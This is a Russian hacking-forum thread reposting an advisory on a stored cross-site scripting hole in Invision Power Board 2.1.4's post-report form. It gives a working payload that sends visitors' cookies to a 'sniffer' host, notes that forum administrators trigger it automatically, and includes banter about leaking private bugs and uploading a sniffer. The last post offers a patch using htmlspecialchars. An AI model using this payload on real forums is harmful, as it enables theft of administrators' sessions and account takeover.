Форум АНТИЧАТ - Active XSS in Invision Power Board 2.1.4

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Active XSS in Invision Power Board 2.1.4 (https://forum.antichat.xyz/showthread.php?t=15298)

Active XSS in Invision Power Board 2.1.4

Команда Cyber Lords, нашла новую багу в IPB.

Цитата:

Advisory: Active XSS in Invision Power Board 2.1.4

Уязвимость/Vulnerability: Межсайтовый скриптинг/Cross Site Scripting

Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый скриптинг, отослав в форме жалобы на сообщение запрос вида: "<script>alert()</script>". С помощью данной атаки возможна утечка конфиденциальных данных пользователя на сторонний сервер.

Форма находится по адресу http://forum/index.php?act=report&t=123&p=123&st=0

Exploit: <script>img = new Image(); img.src = "http://sniffer/file.php?"+document.cookie;</script>

P.S. Далее у всей администрации форума, автоматически появится уведомление о жалобе.

Сам нашёл уязвимость?...

Цитата:

Команда Cyber Lords, нашла новую багу в IPB.

=))))

Первоначально багу нашел наш Морф, о чем ГМемберы могут видеть тут: http://forum.antichat.ru/thread11524.html

Морф красавец!...

Гы воть так нех приватные баги распространять вот блин тоже...................
Докатились............

ХРАНИТЬ ТАКОЕ НАДо!

:))

да зря выложили!

Цитата:

Сообщение от k00p3r

Команда Cyber Lords, нашла новую багу в IPB.

Тоесть можно код сниффера залить, и всё?

Защита.
Открыть sources/action_public/misc/contact_member.php
Найти:

PHP код:


		
			
$this->lib->msg_post    = $this->email->message;

(431 строка по умолчанию)

Заменить на:

PHP код:


		
			
$this->lib->msg_post    = htmlspecialchars($this->email->message);